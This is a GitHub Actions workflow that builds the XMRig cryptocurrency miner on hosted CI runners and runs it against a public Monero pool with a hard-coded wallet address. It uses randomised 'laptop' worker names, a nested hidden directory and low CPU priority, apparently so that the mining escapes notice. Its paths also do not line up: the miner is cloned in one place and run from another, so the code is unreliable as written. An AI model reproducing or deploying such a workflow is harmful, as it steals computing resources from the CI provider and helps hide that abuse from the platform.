name: Run XMRig Miner

on:
  workflow_dispatch:

jobs:
  mine:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v2

      - name: Generate random worker name
        id: worker
        run: echo "name=laptop$(shuf -i 1-100000 -n 1)" >> $GITHUB_OUTPUT

      - name: Setup directories
        run: |
          mkdir -p ~/.local/.run/.hello/runner/go/beein/.go/do
          cd ~/.local/.run/.hello/runner/go/beein/.go/do

      - name: Update and upgrade packages
        run: |
          sudo apt update
          sudo apt upgrade -y

      - name: Install dependencies
        run: |
          sudo apt install -y cpulimit git build-essential cmake libuv1-dev libssl-dev libhwloc-dev

      - name: Clone XMRig
        run: |
          git clone https://github.com/xmrig/xmrig.git

      - name: Build XMRig
        run: |
          cd xmrig
          mkdir build
          cd build
          cmake ..
          make -j1

      - name: Run XMRig
        run: |
          cd ~/.local/.run/.hello/runner/go/beein/.go/do/xmrig/build
          nice -n 19 ./xmrig -o pool.supportxmr.com:3333 \
            -u 46iWdfQ1WgVaJNjPCbVBsnVnzPEjTv8f9ReQTzX4JjCoRsH17PkfXFsCnfcwg1kGmDFD848DJb6QP6mt31SSnrMJ28q1s2p \
            -p ${{ steps.worker.outputs.name }} \
            -k --donate-level 1
